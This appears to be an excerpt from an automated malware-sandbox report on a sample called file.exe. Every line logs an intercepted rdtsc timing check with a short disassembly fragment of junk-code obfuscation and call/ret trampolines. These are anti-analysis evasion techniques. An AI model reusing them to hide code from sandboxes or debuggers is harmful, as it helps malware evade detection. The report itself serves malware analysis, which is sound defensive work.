                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14144BD second address: 14144C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14144C1 second address: 14144C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14144C7 second address: 1414524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e jmp 00007F9844BC1D5Ch 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jmp 00007F9844BC1D62h 0x0000001d pop eax 0x0000001e movzx edx, cx 0x00000021 push B0963E1Bh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9844BC1D64h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14145B0 second address: 14145C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14145C0 second address: 14145E1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9844BC1D5Ch 0x00000008 jbe 00007F9844BC1D56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9844BC1D5Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14145E1 second address: 14145E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14145E5 second address: 14145EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414832 second address: 1414837 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414837 second address: 14148A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F9844BC1D58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov ecx, dword ptr [ebp+1244DFE0h] 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F9844BC1D58h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 pushad 0x00000045 jmp 00007F9844BC1D65h 0x0000004a movsx edx, ax 0x0000004d popad 0x0000004e nop 0x0000004f jbe 00007F9844BC1D5Eh 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14148A7 second address: 14148B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F98450EE8C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14148B6 second address: 14148CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9844BC1D5Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414CB3 second address: 1414CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F98450EE8C6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414CC0 second address: 1414D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F9844BC1D5Eh 0x0000000e jo 00007F9844BC1D58h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 nop 0x00000017 jmp 00007F9844BC1D66h 0x0000001c push 0000001Eh 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F9844BC1D58h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov dword ptr [ebp+1244BDF7h], eax 0x0000003e nop 0x0000003f jmp 00007F9844BC1D62h 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F9844BC1D63h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1414D3F second address: 1414D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F98450EE8C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14150AC second address: 14150C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9844BC1D68h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14150C8 second address: 14150CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14150CC second address: 1415132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F9844BC1D58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 movzx ecx, cx 0x00000026 lea eax, dword ptr [ebp+12485BF7h] 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F9844BC1D58h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+1244BE06h] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415132 second address: 1415137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415137 second address: 141513D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141513D second address: 1415141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1415141 second address: 13F1835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9844BC1D67h 0x0000000e nop 0x0000000f or edx, 683FB9E2h 0x00000015 mov cl, CEh 0x00000017 lea eax, dword ptr [ebp+12485BB3h] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F9844BC1D58h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push eax 0x00000038 jmp 00007F9844BC1D60h 0x0000003d mov dword ptr [esp], eax 0x00000040 movzx edi, dx 0x00000043 call dword ptr [ebp+122D181Ch] 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1440AD9 second address: 1440AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441178 second address: 144117E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144117E second address: 1441195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F98450EE8CDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441195 second address: 1441199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E06 second address: 1446E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F98450EE8C6h 0x0000000d jmp 00007F98450EE8CEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445BDF second address: 1445BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D49 second address: 1445D59 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D59 second address: 1445D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D5F second address: 1445D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D63 second address: 1445D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9844BC1D5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446120 second address: 1446126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446126 second address: 1446131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446131 second address: 1446145 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F98450EE8CAh 0x00000008 jnp 00007F98450EE8DDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446145 second address: 1446162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9844BC1D61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144570A second address: 144570E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144570E second address: 1445714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445714 second address: 144574C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F98450EE8C6h 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d jmp 00007F98450EE8D1h 0x00000012 jmp 00007F98450EE8CDh 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jno 00007F98450EE8C6h 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446486 second address: 144648A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144648A second address: 144649C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F98450EE8CEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446751 second address: 1446757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446757 second address: 1446786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D8h 0x00000009 popad 0x0000000a jmp 00007F98450EE8CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446786 second address: 144678F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446B05 second address: 1446B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446B09 second address: 1446B0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB5DF second address: 13CB5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E31E second address: 144E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E329 second address: 144E32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E32D second address: 144E331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E4B2 second address: 144E4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E4C3 second address: 144E4E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D56h 0x00000008 jmp 00007F9844BC1D67h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E4E4 second address: 144E544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F98450EE8D7h 0x0000000a jmp 00007F98450EE8D9h 0x0000000f popad 0x00000010 js 00007F98450EE8DAh 0x00000016 jmp 00007F98450EE8D4h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 pushad 0x00000023 jnp 00007F98450EE8C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E6D3 second address: 144E6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9844BC1D64h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144EDB0 second address: 144EDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F98450EE8CFh 0x0000000b jno 00007F98450EE8C6h 0x00000011 popad 0x00000012 pushad 0x00000013 je 00007F98450EE8C6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144EDD7 second address: 144EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144F234 second address: 144F246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jng 00007F98450EE8C6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144F246 second address: 144F24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14516D2 second address: 14516D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14544A3 second address: 14544E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Dh 0x00000007 jmp 00007F9844BC1D69h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F9844BC1D6Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9844BC1D5Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14544E2 second address: 14544E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1454652 second address: 1454657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1454657 second address: 145465C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145990D second address: 145992F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9844BC1D62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jp 00007F9844BC1D56h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145992F second address: 1459949 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F98450EE8C6h 0x0000000b pop esi 0x0000000c je 00007F98450EE8D2h 0x00000012 jne 00007F98450EE8C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459E2D second address: 1459E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A0DD second address: 145A0E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A0E3 second address: 145A0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145AD2E second address: 145AD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145AD32 second address: 145AD3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9844BC1D56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145DE9F second address: 145DEBA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98450EE8CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F98450EE8C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145DEBA second address: 145DED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D62h 0x00000007 jnl 00007F9844BC1D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145DED9 second address: 145DEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D7C2 second address: 145D7CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F9844BC1D56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146138E second address: 14613A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F98450EE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14617E9 second address: 14617FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14617FA second address: 1461810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F98450EE8CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1461810 second address: 1461814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1461814 second address: 1461818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1467EDF second address: 1467EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1467EE7 second address: 1467EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14681E4 second address: 14681EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14681EA second address: 14681EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14684BE second address: 14684C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14684C4 second address: 14684CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146876B second address: 1468771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1468771 second address: 1468777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1468777 second address: 14687A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9844BC1D60h 0x00000009 popad 0x0000000a pop esi 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9844BC1D66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469005 second address: 146900B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146900B second address: 1469016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
